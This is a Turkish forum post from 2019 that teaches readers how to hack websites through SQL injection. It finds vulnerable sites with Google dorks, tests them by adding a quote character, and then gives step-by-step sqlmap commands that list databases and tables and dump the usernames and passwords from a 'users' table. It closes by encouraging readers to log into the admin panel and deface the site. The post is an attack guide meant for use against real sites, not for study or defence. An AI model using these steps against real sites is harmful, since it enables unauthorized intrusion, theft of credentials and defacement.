- 14 Haz 2019
- 2
- 0
ÖNCELİKLE HERKESE MERHABA BU BENİM FORUMDAKİ İLK KONUM BİR HATAM OLURSA SÖYLEMENİZ YETERLİ OLUCAKTIR :sırıtan
EVET SQL AÇIKLI SİTE BULDUNUZ DİYELİM BULMAK ÇOK ZOR DEĞİL FORUMDA ARAŞTIRINIZ SQL AÇIKLI OLAN BİR SİTE ARIYORSANIZ GENELLİKLE LİNKİN SONUNDA
php?id= OLACAK SİTELERE BAKMANIZI ÖNERİRİM MESELA inurl:home.php?id= ŞU ŞEKİLDE ARAMA YAPARSAK GOOGLE DE SQL AÇIKLI SİTE BULMANIZA YARAR BUNA Kİ DORK DENİR ÇOK DEYİNMEYECEĞİM
O KONULARA EVET BİR SİTE BULDUNUZ VE SQL AÇIĞININ OLUP OLMADIĞINI KONTROL ETMEK İÇİN ' LİNKİN SONUN TEK TIRNAK KOYMANIZ YETERLİ OLUR SİTE HATA
KOMUTLARI VERİRSE SQL AÇIĞI VARDIR EĞERKİ SİTE YİNE NORMAL GÖZÜKÜYORSA SQL AÇIĞI YOKTUR !
ÖRNEK : website.com/home.php?=id242 BU SİTELERDE GENELLİKLE SQL AÇIĞI OLUR !
ŞİMDİ İSE SQL AÇIKLI SİTE NASIL HACKLENİR ONA GEÇELİM SQL İLE NEREYE ULAŞABİLİRİZ DERSEK HEDEF SİTENİN VERİTABANINA YANİ DATABASE ´' İNE
KALİ LİNUXUMUZU AÇIP TERMİNALE ŞU KOMUTLARI YAZIYORUZ KOMUTLARIN ANLAMLARINIDA YAZICAM ANLAMANIZ İÇİN !
1 - SİTEDEKİ DATABASE ' LERİ İSTİYECEĞİZ BUNUN İÇİN KOMUTUMUZ ŞU --dbs --> DATABASELERİ GÖSTERİR
sqlmap -u hedefsite.com/home.php?id=423 --dbs
EVET ŞİMDİ DATABASE ' LERİMİZ GELDİ
2 - ŞİMDİ İSE DATABASE ' LERİN İÇİNDEKİ TABLES ' LARA BAKICAZ BUNUN İÇİN KOMUTUMUZ ŞU --tables --> DATABASEDEKİ TABLOLARI GÖSTERİR
BU ARADA ARKADAŞLAR BİR ÖNCEKİ KOMUTTAKİ BİLGİLERİ ALDIĞIMIZDA ARTIK ONU BÜYÜK HARFLE YAZARIZ ŞU ŞEKİLDE : sqlmap -u hedefsite.com/home.php?id=423 -D
sqlmap -u hedefsite.com/home.php?id=423 -D [databasenin adı] --tables
EVET TABLESLERİMİZDE GELDİ
3 - TABLESLERİ ' DE ALDIK ŞİMDİ COLUMNS ' LERİMİZİDE ALICAZ GENELLİKLE USER & ADMİNUSER GİBİ TABLESLERE GİRMENİZ DAHA MANTIKLI !
KODUMUZ ŞÖYLE sqlmap -u hedefsite.com/home.php?id=423 -D topnewsk_finaldb -T users --columns
4 - COLUMNS ' LERİDE ALDIĞIMIZA GÖRE ONUNDA İÇİNDEKİLERİ ALICAZ ! --dump --> COLUMNS ' LERE GİRER!
sqlmap -u hedefsite.com/home.php?id=423 -D topnewsk_finaldb -T users -C users,passuserword --dump DİYEREK İÇİNDEKİ VERİLERİ GÖRÜCEZ !
MERAK ETMEYİN SİZDE BENDEKİ GİBİ NULL / BLANK YAZMAYACAK BİLGİLER GELİCEKTİR !
BUNDAN SONRASI SİZDE ARKADAŞLAR ADMİN PANELİ BULUP GİRİN ORDAN SİTEYE İNDEX FALAN NE YAPMAK İSTERSENİZ SİZE KALMIŞ BU KONU BU KADARDI BENİ DİNLEDİĞİNİZ İÇİN TEŞEKKÜRLER ARKADAŞLAR UNUTMADAN 2019 SİTELERİNE BAKIN KENDİNİZ DORKLARDAN BULUN AÇIK SİTELERİ O HAZIR SİTELERİN ÇOĞU HACKLENDİĞİ İÇİN VEYA UZUN ZAMANDIR KULLANILMAIĞI İÇİN DATABASE ' LERİNE ULAŞAMAZSINIZ BUNA DİKKAT EDİN.
